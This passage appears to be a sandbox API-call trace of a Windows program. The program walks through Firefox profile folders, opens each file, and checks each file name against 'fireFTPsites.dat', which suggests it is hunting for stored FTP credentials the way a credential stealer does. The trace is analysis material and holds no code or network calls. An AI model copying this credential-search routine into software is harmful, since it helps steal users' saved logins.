0 [0590.429] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.429] lstrlenW (lpString="\\") returned 1 [0590.429] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.429] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63be60 [0590.429] lstrlenW (lpString="webapps.json") returned 12 [0590.429] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\") returned 84 [0590.429] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e6108 [0590.429] LocalFree (hMem=0x63be60) returned 0x0 [0590.429] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.429] CloseHandle (hObject=0x660) returned 1 [0590.429] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0590.429] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63f8c8 [0590.429] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x63f8c8, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json") returned 0x61 [0590.429] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.429] CloseHandle (hObject=0x660) returned 1 [0590.429] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.429] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2 [0590.429] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.429] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.429] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c4a0 [0590.429] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.429] CloseHandle (hObject=0x668) returned 1 [0590.430] CloseHandle (hObject=0x660) returned 1 [0590.430] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.430] StrStrIW (lpFirst="webapps.json", lpSrch="fireFTPsites.dat") returned 0x0 [0590.430] LocalFree (hMem=0x5e6108) returned 0x0 [0590.430] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0 [0590.430] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.430] LocalFree (hMem=0x63bd28) returned 0x0 [0590.430] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.430] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.430] lstrlenW (lpString="\\") returned 1 [0590.430] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.430] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.430] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0590.430] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.430] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56cab0 [0590.430] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.430] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.430] CloseHandle (hObject=0x4c8) returned 1 [0590.430] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0590.430] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x2ed9860 [0590.430] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x2ed9860, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite") returned 0x60 [0590.430] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.430] CloseHandle (hObject=0x4c8) returned 1 [0590.430] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.430] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0590.430] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.430] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.431] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c530 [0590.431] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.432] CloseHandle (hObject=0x660) returned 1 [0590.432] CloseHandle (hObject=0x4c8) returned 1 [0590.432] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.432] StrStrIW (lpFirst="webappsstore.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.432] LocalFree (hMem=0x56cab0) returned 0x0 [0590.432] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 0 [0590.432] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0590.432] LocalFree (hMem=0x63d6b0) returned 0x0 [0590.432] LocalFree (hMem=0x63d588) returned 0x0 [0590.432] lstrlenW (lpString="Profile0") returned 8 [0590.432] LocalFree (hMem=0x2edd958) returned 0x0 [0590.433] LocalFree (hMem=0x2eed7d0) returned 0x0 [0590.433] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.433] LocalFree (hMem=0x2ed3050) returned 0x0 [0590.433] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.433] lstrlenW (lpString="*.*") returned 3 [0590.433] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.433] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5e6f98 [0590.433] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*", lpFindFileData=0x52dfa4 | out: lpFindFileData=0x52dfa4) returned 0x57d1e0 [0590.433] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.433] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfa4 | out: lpFindFileData=0x52dfa4) returned 1 [0590.433] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.433] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.433] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfa4 | out: lpFindFileData=0x52dfa4) returned 1 [0590.434] lstrcmpiW (lpString1="Crash Reports", lpString2=".") returned 1 [0590.434] lstrcmpiW (lpString1="Crash Reports", lpString2="..") returned 1 [0590.434] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.434] lstrlenW (lpString="") returned 0 [0590.434] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.434] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed3050 [0590.434] lstrlenW (lpString="Crash Reports") returned 13 [0590.434] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.434] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5d7c90 [0590.434] LocalFree (hMem=0x2ed3050) returned 0x0 [0590.434] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0590.434] lstrlenW (lpString="\\*.*") returned 4 [0590.434] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0590.434] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5ed570 [0590.434] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*", lpFindFileData=0x52dd2c | out: lpFindFileData=0x52dd2c) returned 0x57ca60 [0590.434] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.434] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd2c | out: lpFindFileData=0x52dd2c) returned 1 [0590.434] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.434] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.434] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd2c | out: lpFindFileData=0x52dd2c) returned 1 [0590.434] lstrlenW (lpString="\\") returned 1 [0590.434] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0590.434] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed688 [0590.434] lstrlenW (lpString="InstallTime20131025151332") returned 25 [0590.434] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 64 [0590.434] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.434] LocalFree (hMem=0x5ed688) returned 0x0 [0590.434] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.434] CloseHandle (hObject=0x660) returned 1 [0590.434] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.434] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2ed9860 [0590.434] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpDst=0x2ed9860, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 0x5a [0590.434] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.434] CloseHandle (hObject=0x660) returned 1 [0590.434] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.434] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa [0590.434] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.434] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.435] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c5c0 [0590.435] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.435] CloseHandle (hObject=0x668) returned 1 [0590.435] CloseHandle (hObject=0x660) returned 1 [0590.435] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.435] StrStrIW (lpFirst="InstallTime20131025151332", lpSrch="fireFTPsites.dat") returned 0x0 [0590.435] LocalFree (hMem=0x56cab0) returned 0x0 [0590.435] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd2c | out: lpFindFileData=0x52dd2c) returned 0 [0590.435] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.435] LocalFree (hMem=0x5ed570) returned 0x0 [0590.435] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.435] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfa4 | out: lpFindFileData=0x52dfa4) returned 1 [0590.435] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0590.435] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0590.435] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.435] lstrlenW (lpString="") returned 0 [0590.435] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.435] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed3050 [0590.435] lstrlenW (lpString="Profiles") returned 8 [0590.435] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.435] LocalAlloc (uFlags=0x40, uBytes=0xf6) returned 0x5d7c90 [0590.435] LocalFree (hMem=0x2ed3050) returned 0x0 [0590.435] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0590.435] lstrlenW (lpString="\\*.*") returned 4 [0590.435] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0590.435] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x5e6108 [0590.435] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x52dd2c | out: lpFindFileData=0x52dd2c) returned 0x57ca60 [0590.435] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.435] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd2c | out: lpFindFileData=0x52dd2c) returned 1 [0590.436] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.436] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.436] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd2c | out: lpFindFileData=0x52dd2c) returned 1 [0590.436] lstrcmpiW (lpString1="3y2joh8o.default", lpString2=".") returned 1 [0590.436] lstrcmpiW (lpString1="3y2joh8o.default", lpString2="..") returned 1 [0590.436] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0590.436] lstrlenW (lpString="\\") returned 1 [0590.436] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0590.436] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x63f8c8 [0590.436] lstrlenW (lpString="3y2joh8o.default") returned 16 [0590.436] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 59 [0590.436] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x63d588 [0590.436] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.436] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.436] lstrlenW (lpString="\\*.*") returned 4 [0590.436] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.436] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63d6b0 [0590.436] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*.*", lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 0x57c9a0 [0590.436] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.436] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.436] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.436] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.436] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.436] lstrlenW (lpString="\\") returned 1 [0590.436] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.436] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.436] lstrlenW (lpString="addons.json") returned 11 [0590.436] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.436] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.436] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.436] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.436] CloseHandle (hObject=0x668) returned 1 [0590.436] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.436] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.436] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json") returned 0x58 [0590.436] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.436] CloseHandle (hObject=0x668) returned 1 [0590.437] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.437] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18 [0590.437] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.437] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.437] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.437] CloseHandle (hObject=0x66c) returned 1 [0590.437] CloseHandle (hObject=0x668) returned 1 [0590.437] LocalFree (hMem=0x63bd28) returned 0x0 [0590.437] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.437] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.437] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0590.437] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0590.437] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.437] lstrlenW (lpString="\\") returned 1 [0590.437] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.437] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.437] lstrlenW (lpString="bookmarkbackups") returned 15 [0590.437] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.437] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56cab0 [0590.437] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.437] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.437] lstrlenW (lpString="\\*.*") returned 4 [0590.437] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.437] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x2ed9860 [0590.437] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*.*", lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0x5b9b50 [0590.438] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.438] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.438] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.438] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.438] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.438] lstrlenW (lpString="\\") returned 1 [0590.438] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.438] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed99a8 [0590.438] lstrlenW (lpString="bookmarks-2017-06-30_5.json") returned 27 [0590.438] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0590.438] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63f8c8 [0590.438] LocalFree (hMem=0x2ed99a8) returned 0x0 [0590.438] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.438] CloseHandle (hObject=0x66c) returned 1 [0590.438] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0590.438] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63fa40 [0590.438] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x63fa40, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") returned 0x78 [0590.438] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.438] CloseHandle (hObject=0x66c) returned 1 [0590.438] CreateFileW 